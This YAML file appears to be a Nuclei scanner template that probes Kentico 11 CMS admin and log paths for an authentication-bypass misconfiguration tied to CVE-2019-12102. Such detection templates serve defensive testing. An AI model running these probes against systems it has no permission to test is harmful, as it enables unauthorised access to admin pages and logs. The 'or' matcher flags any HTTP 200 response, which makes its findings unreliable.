id: kentico-11-misconfig

info:
  name: Kentico 11 Authentication Bypass Misconfiguration
  author: s1d6p01nt7
  severity: high
  description: |
    Kentico 11 is vulnerable to an authentication bypass due to a misconfiguration. Attackers can access admin pages and logs without proper authentication.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12102
  metadata:
    max-request: 3
  tags: cve2019,misconfig,kentico,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/CMSPages/logs.aspx"
      - "{{BaseURL}}/CMSDesk/default.aspx"
      - "{{BaseURL}}/Admin/"

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "Kentico CMS"
          - "Application Log"
          - "Event Log"

      - type: status
        status:
          - 200